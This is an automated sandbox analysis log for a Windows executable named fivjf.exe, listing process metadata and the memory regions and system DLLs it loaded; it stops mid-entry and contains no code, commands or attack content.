# Flog Txt Version 1 # Analyzer Version: 2.3.2 # Analyzer Build Date: Nov 22 2018 14:27:27 # Log Creation Date: 27.11.2018 19:45:19.283 Process: id = "1" image_name = "fivjf.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fivjf.exe" page_root = "0x4990f000" os_pid = "0x954" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fivjf.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 5 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 7 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8 start_va = 0x13f0e0000 end_va = 0x13f113fff entry_point = 0x13f0e0000 region_type = mapped_file name = "fivjf.exe" filename = "\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fivjf.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fivjf.exe") Region: id = 9 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 11 start_va = 0x7fffffd7000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 12 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 145 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 146 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 147 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 148 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 149 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 150 start_va = 0x77450000 end_va = 0x77549fff entry_point = 0x77450000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 151 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 152 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 153 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 154 start_va = 0x7fefdc90000 end_va = 0x7fefdcf6fff entry_point = 0x7fefdc90000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 155 start_va = 0x7fefdd00000 end_va = 0x7fefddc8fff entry_point = 0x7fefdd00000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 156 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 157 start_va = 0x7fefe350000 end_va = 0x7fefe35dfff entry_point = 0x7fefe350000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 158 start_va = 0x7fefe360000 end_va = 0x7feff0e7fff entry_point = 0x7fefe360000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 159 start_va = 0x7feff2e0000 end_va = 0x7feff350fff entry_point = 0x7feff2e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 160 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 161 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 162 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 163 start_va = 0x410000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 164 start_va = 0x420000 end_va = 0x5a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 165 start_va = 0x7fefe0a0000 end_va = 0x7fefe1a8fff entry_point = 0x7fefe0a0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 166 start_va = 0x7feff950000 end_va = 0x7feff97dfff entry_point = 0x7feff950000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 167 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 168 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 169 start_va = 0x5b0000 end_va = 0x730fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 170 start_va = 0x740000 end_va = 0x1b3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000740000" filename = "" Region: id = 171 start_va = 0x7fef8f10000 end_va = 0x7fef8f12fff entry_point = 0x7fef8f10000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 172 start_va = 0x1b40000 end_va = 0x1e0efff entry_point = 0x1b40000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 173 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 174 start_va = 0x1e50000 end_va = 0x1f4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 175 start_va = 0x7fefddf0000 end_va = 0x7fefdff2fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 176 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 177 start_va = 0x7fefd4b0000 end_va = 0x7fefd4befff entry_point = 0x7fefd4b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 178 start_va = 0x7fefbf10000 end_va = 0x7fefbf65fff entry_point = 0x7fefbf10000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 179 start_va = 0x1f50000 end_va = 0x202efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f50000" filename = "" Region: id = 180 start_va = 0x2060000 end_va = 0x20dffff entry_point = 0x0 region_type = private name = "private_0x0000000002060000" filename = "" Region: id = 181 start_va = 0x7fefbf70000 end_va = 0x7fefc09bfff entry_point = 0x7fefbf70000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 182 start_va = 0x7fefdbb0000 end_va = 0x7fefdc86fff entry_point = 0x7fefdbb0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 183 start_va = 0x1e0000 end_va = 0x1e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 184 start_va = 0x7fefc0f0000 end_va = 0x7fefc2e3fff entry_point = 0x7fefc0f0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 185 start_va = 0x200000 end_va = 0x201fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 186 start_va = 0x7fefa4d0000 end_va = 0x7fefa526fff entry_point = 0x7fefa4d0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 187 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 188 start_va = 0x7fefe000000 end_va = 0x7fefe098fff entry_point = 0x7fefe000000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 189 start_va = 0x1e10000 end_va = 0x1e10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e10000" filename = "" Region: id = 190 start_va = 0x77830000 end_va = 0x77836fff entry_point = 0x77830000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 191 start_va = 0x7fef5230000 end_va = 0x7fef5283fff entry_point = 0x7fef5230000 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 192 start_va = 0x7fef5290000 end_va = 0x7fef5e46fff entry_point = 0x7fef5290000 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 193 start_va = 0x7feff4e0000 end_va = 0x7feff738fff entry_point = 0x7feff4e0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 194 start_va = 0x1e20000 end_va = 0x1e20fff entry_point = 0x1e20000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 195 start_va = 0x1e30000 end_va = 0x1e31fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 196 start_va = 0x7fefd660000 end_va = 0x7fefd66efff entry_point = 0x7fefd660000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 197 start_va = 0x7fefd750000 end_va = 0x7fefd8b6fff entry_point = 0x7fefd750000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 198 start_va = 0x7fefd990000 end_va = 0x7fefdb07fff entry_point = 0x7fefd990000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 199 start_va = 0x7feff360000 end_va = 0x7feff489fff entry_point = 0x7feff360000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 200 start_va = 0x2260000 end_va = 0x235ffff entry_point = 0x0 region_type = private name = "private_0x0000000002260000" filename = "" Region: id = 201 start_va = 0x7fefd670000 end_va = 0x7fefd6a5fff entry_point = 0x7fefd670000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 202 start_va = 0x7fefd900000 end_va = 0x7fefd919fff entry_point = 0x7fefd900000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 203 start_va = 0x7feff0f0000 end_va = 0x7feff2c6fff entry_point = 0x7feff0f0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 204 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 205 start_va = 0x1e40000 end_va = 0x1e46fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e40000" filename = "" Region: id = 206 start_va = 0x2030000 end_va = 0x2031fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002030000" filename = "" Region: id = 207 start_va = 0x2360000 end_va = 0x2752fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002360000" filename = "" Region: id = 208 start_va = 0x7fefb520000 end_va = 0x7fefb54cfff entry_point = 0x7fefb520000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 209 start_va = 0x7fefe1b0000 end_va = 0x7fefe201fff entry_point = 0x7fefe1b0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 210 start_va = 0x2050000 end_va = 0x2050fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002050000" filename = "" Region: id = 211 start_va = 0x20e0000 end_va = 0x20fefff entry_point = 0x20e0000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db" filename = "\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000016.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db") Region: id = 212 start_va = 0x7fefd5c0000 end_va = 0x7fefd5cefff entry_point = 0x7fefd5c0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 213 start_va = 0x2040000 end_va = 0x2043fff entry_point = 0x2040000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 214 start_va = 0x2100000 end_va = 0x212ffff entry_point = 0x2100000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000012.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db") Region: id = 215 start_va = 0x2130000 end_va = 0x2133fff entry_point = 0x2130000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 216 start_va = 0x2140000 end_va = 0x21a5fff entry_point = 0x2140000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 217 start_va = 0x7fefd480000 end_va = 0x7fefd4a4fff entry_point = 0x7fefd480000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 5960 start_va = 0x1e50000 end_va = 0x1e50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e50000" filename = "" Region: id = 5961 start_va = 0x1e60000 end_va = 0x1e63fff entry_point = 0x1e60000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 5962 start_va = 0x21b0000 end_va = 0x21b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000021b0000" filename = "" Region: id = 5963 start_va = 0x2820000 end_va = 0x291ffff entry_point = 0x0 region_type = private name = "private_0x0000000002820000" filename = "" Region: id = 5964 start_va = 0x29a0000 end_va = 0x2a9ffff entry_point = 0x0 region_type = private name = "private_0x00000000029a0000" filename = "" Region: id = 5965 start_va = 0x2ac0000 end_va = 0x2bbffff entry_point = 0x0 region_type = private name = "private_0x0000000002ac0000" filename = "" Region: id = 5966 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 5967 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 9682 start_va = 0x2940000 end_va = 0x2a3ffff entry_point = 0x0 region_type = private name = "private_0x0000000002940000" filename = "" Region: id = 9683 start_va = 0x7fef5230000 end_va = 0x7fef5283fff entry_point = 0x7fef5230000 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 12211 start_va = 0x2cb0000 end_va = 0x2daffff entry_point = 0x0 region_type = private name = "private_0x0000000002cb0000" filename = "" Region: id = 12508 start_va = 0x2e90000 end_va = 0x2f8ffff entry_point = 0x0 region_type = private name = "private_0x0000000002e90000" filename = "" Region: id = 12509 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 14168 start_va = 0x2c90000 end_va = 0x2d8ffff entry_point = 0x0 region_type = private name = "private_0x0000000002c90000" filename = "" Region: id = 14169 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 14170 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14171 start_va = 0x1f0000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 14172 start_va = 0x1e20000 end_va = 0x1e28fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e20000" filename = "" Region: id = 14173 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14174 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14175 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14176 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14177 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14178 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14226 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14227 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14228 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14229 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14230 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14231 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14232 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14233 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14234 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14235 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14236 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14237 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14238 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14239 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14240 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14241 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14242 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14243 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14244 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14245 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14246 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14247 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14248 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14249 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14250 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14251 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14316 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14317 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14318 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14319 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14320 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14321 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14322 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14323 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14324 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14325 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14326 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14327 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14328 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14329 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14330 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14331 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14332 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14333 start_va = 0x1f0000 end_va = 0x1f8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 14334 start_va = 0x1f0000 end_va = 